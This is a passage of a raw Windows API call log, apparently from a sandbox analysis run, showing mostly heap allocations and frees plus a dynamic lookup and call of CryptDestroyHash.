(HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae968 [0035.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0035.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899b8 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889910 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889508 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca48 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c730 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc88 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889490 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891d8 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc40 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cce8 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9d0 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c940 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccd0 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.155] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889778 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.155] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0035.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0035.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0035.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.156] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0035.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae968 [0035.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x7ae968, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0035.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0035.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0035.157] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0035.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0035.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0035.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0035.157] CryptDestroyHash (hHash=0x7c2100) returned 1 [0035.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0035.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0035.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0035.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0035.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.159] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0035.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0035.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0035.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.161] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0035.161] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.161] PeekMessageW (in: 